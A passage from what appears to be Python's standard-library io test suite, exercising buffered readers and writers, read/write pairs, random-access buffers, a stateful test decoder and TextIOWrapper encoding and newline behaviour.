self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEquals(b"a", bufio.read(1))
self.assertEquals(b"b", bufio.read1(1))
self.assertEquals(rawio._reads, 1)
self.assertEquals(b"c", bufio.read1(100))
self.assertEquals(rawio._reads, 1)
self.assertEquals(b"d", bufio.read1(100))
self.assertEquals(rawio._reads, 2)
self.assertEquals(b"efg", bufio.read1(100))
self.assertEquals(rawio._reads, 3)
self.assertEquals(b"", bufio.read1(100))
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEquals(bufio.readinto(b), 2)
self.assertEquals(b, b"ab")
self.assertEquals(bufio.readinto(b), 2)
self.assertEquals(b, b"cd")
self.assertEquals(bufio.readinto(b), 2)
self.assertEquals(b, b"ef")
self.assertEquals(bufio.readinto(b), 1)
self.assertEquals(b, b"gf")
self.assertEquals(bufio.readinto(b), 0)
self.assertEquals(b, b"gf")
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEquals(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEquals(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEquals(b"abcd", bufio.read(6))
self.assertEquals(b"e", bufio.read(1))
self.assertEquals(b"fg", bufio.read())
self.assertEquals(b"", bufio.peek(1))
self.assertTrue(None is bufio.read())
self.assertEquals(b"", bufio.read())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEquals(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEquals(b"abcdefg", bufio.read())
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
class CBufferedReaderTest(BufferedReaderTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so
# checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEquals(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEquals(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEquals(b"".join(rawio._write_stack), b"abcghi")
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEquals(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEquals(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEquals(bufio.write(b"abcd"), 4)
self.assertEquals(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEquals(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEquals(written, 16)
self.assertEquals(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEquals(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEquals(b"abc", writer._write_stack[0])
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEquals(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 3)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEquals(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings() as w:
warnings.simplefilter("always", DeprecationWarning)
self.tp(self.MockRawIO(), 8, 12)
self.assertEqual(len(w.warnings), 1)
warning = w.warnings[0]
self.assertTrue(warning.category is DeprecationWarning)
self.assertEqual(str(warning.message),
"max_buffer_size is deprecated")
class CBufferedWriterTest(BufferedWriterTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings() as w:
warnings.simplefilter("always", DeprecationWarning)
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
self.assertEqual(len(w.warnings), 1)
warning = w.warnings[0]
self.assertTrue(warning.category is DeprecationWarning)
self.assertEqual(str(warning.message),
"max_buffer_size is deprecated")
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEquals(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEquals(b"as", rw.read(2))
self.assertEquals(2, rw.tell())
rw.seek(0, 0)
self.assertEquals(b"asdf", rw.read(4))
rw.write(b"asdf")
rw.seek(0, 0)
self.assertEquals(b"asdfasdfl", rw.read())
self.assertEquals(9, rw.tell())
rw.seek(-4, 2)
self.assertEquals(5, rw.tell())
rw.seek(2, 1)
self.assertEquals(7, rw.tell())
self.assertEquals(b"fl", rw.read(11))
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEquals(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEquals(b"ef", read_func(bufio, 2))
self.assertEquals(6, bufio.tell())
bufio.flush()
self.assertEquals(6, bufio.tell())
self.assertEquals(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEquals(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEquals(b"12345fghi", raw.getvalue())
self.assertEquals(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs to
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
class CBufferedRandomTest(BufferedRandomTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEquals(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEquals(d.decode(b'oiabcd'), '')
self.assertEquals(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEquals(t.encoding, "latin1")
self.assertEquals(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEquals(t.encoding, "utf8")
self.assertEquals(t.line_buffering, True)
self.assertEquals("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEquals(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEquals(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEquals(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEquals(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEquals(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEquals(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEquals(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEquals(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEquals(got_line, exp_line)
self.assertEquals(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
